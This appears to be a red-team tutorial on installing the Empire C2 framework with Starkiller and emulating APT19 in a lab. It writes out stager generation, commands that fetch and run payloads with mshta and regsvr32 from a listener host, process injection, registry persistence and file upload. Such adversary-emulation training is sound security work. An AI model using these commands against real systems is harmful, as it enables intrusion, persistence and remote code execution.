Empire

Demo of Empire with Starkiller is in this Red Team Village event video where I emulate APT19:
Install Empire
Install on Kali:
1
sudo apt install powershell-empire
Copied!
Install on Ubuntu:
1
cd /opt
2
sudo git clone https://github.com/BC-SECURITY/Empire.git
3
cd Empire
4
sudo ./setup/install.sh
Copied!
If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, there is a small bug because it wants Ubuntu 20.04 but slingshot is in 18.04. Replace the line in setup/install.sh with the correct version:
wget -q https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb 
And comment the version test: 
#if [ $VERSION_ID != "20.04" ]; then # echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit #fi 
Download Starkiller if you want a GUI:
1
cd /opt
2
sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage
3
sudo chmod +x starkiller-1.0.0.AppImage
Copied!
Run Empire
1
sudo empire
Copied!
On Kali:
1
sudo powershell-empire
Copied!
Run Starkiller
Run Empire for connectivity through Starkiller if you want a GUI:
1
sudo empire --rest --username <user> --password <password>
Copied!
Open Starkiller:
1
cd /opt/starkiller
2
./starkiller-1.2.2.AppImage
Copied!
Login to Starkiller:
Name: localhost:1337
Username: <user>
Password: <password>
Emulating TTPs
Will use an adversary emulation plan for APT19 as an example: https://www.scythe.io/library/threatthursday-apt19​
Tactic
Description
Description
APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.
Goal and Intent
Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.
Command and Control
Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) -  used Base64 to encode communications to the C2 server
Initial Access
Spearphishing attachment (T1193); Spearphishing link (T1192)
Execution
PowerShell (T1086);  User Execution; Hidden Windows (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload;  DLL Side-Loading (T1073)
Discover
System Owner/User Discovery (T1033); System Information Discovery (T1082)  System Network Configuration Discovery (T1016)
Persistence
Registry Run Keys/ Start up Folder (T1060) -  establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\
Defense Evasion
Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques
Listeners 
Create Listener
1
Type: http
2
Name: http
3
Host: http://10.0.0.187
4
Port: 80
5
BindIP: 10.0.0.187
6
Jitter: 0.5
7
StagingKey: georgy
Copied!
Stagers
Generate Stager HTA:
1
Type: windows/hta
2
Listner: http
3
Base64: True
4
Language: powershell
5
Outfile: /tmp/Resume.hta
Copied!
Generate Stager SCT:
1
Type: windows/launcher_sct
2
Listner: http
3
Base64: True
4
Language: powershell
Copied!
Generate Stager DLL:
1
Type: windows/dll
2
Listner: http
3
Arch: x86
4
Language: powershell
5
OutFile: /tmp/launcher.dll
6
​
7
Optional Fields
8
Obfuscate: True
9
ObfuscateCommand: Token\String\1
Copied!
Download the stagers to /tmp and serve with SimpleHTTPServer
1
cd /tmp
2
python -m SimpleHTTPServer 8080
Copied!
Initial Access
Email with link to Resume.hta
Execution
Show execution of HTA file:
1
mshta http://10.0.0.187:8080/Resume.hta
Copied!
Migrate to another process with reflective PE Injection: https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/​
1
See processes running: ps
2
usemodule code_execution/invoke_reflectivepeinjection
3
set ProcID: <processID>
4
set DllPath: /tmp/launcher.dll
Copied!
Discovery
1
whoami
2
usemodule situational_awareness/host/antivirusproduct 
3
usemodule situational_awareness/host/get_uaclevel 
4
usemodule situational_awareness/host/winenum
Copied!
Persistence
1
usemodule persistence/userland/registry
2
set Listener: http
Copied!
Open regedit HKCU\Software\Microsoft\Windows\CurrentVersion
Defense Evasion
Execution with regsvr32 and scripting. Created a shortcut called Chrome with Target set as:
1
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll"
Copied!
Upload
1
cd C:\Users\<username>
2
upload /tmp/file
3
shell C:\Users\<username>\<executable>
Copied!
Other Resources
Using Empire with Starkiller: How to from BC-Security​